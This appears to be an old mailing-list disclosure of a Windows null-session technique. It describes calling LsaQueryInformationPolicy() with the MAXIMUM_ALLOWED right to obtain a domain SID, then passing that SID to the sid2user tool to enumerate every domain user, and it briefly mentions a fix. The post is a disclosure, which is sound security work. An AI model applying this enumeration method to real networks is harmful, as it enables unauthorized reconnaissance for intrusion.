This may not be new but I haven't seen it anywhere else so
here it is.
- Description -
It is possible to list the whole user list of a domain by
querying any workstation on that domain. Even if the domain
controller is hidden behind a firewall or has IP filtering
enabled, the list comes out gracefully since the
workstation forwards the query for you.
I suspect that this may even work on a workstation
connected to it's DC through a VPN but I haven't tested it
yet.
- Explanations -
The idea is to get the workstation to spit it's domain SID
with the LsaQueryInformationPolicy() function. Normally,
that fonction would require the "GENERIC_READ |
GENERIC_EXECUTE" access rights in order to work but I
discovered that by simply using the "MAXIMUM_ALLOWED"
access right it works through the good old null session.
- Exploitation -
I wrote a small program called "dom2sid" demonstrating
this. It should be available shortly on the securityfocus
free tools list. It returns the computer/domain names and
SIDs. You can then feed this to the popular sid2user tool
and get the whole user list.If both SIDs are equal, you
found a DC.
- Fix -
The "restrict anonymous" solution provided by Microsoft
doesn't help here. The only way I was able to stop this
behavior was to use a program called fixpol.exe. Don't ask
me where I found that one, I don't remember...
Enjoy !!
If this is old stuff, well just forget about this message !!
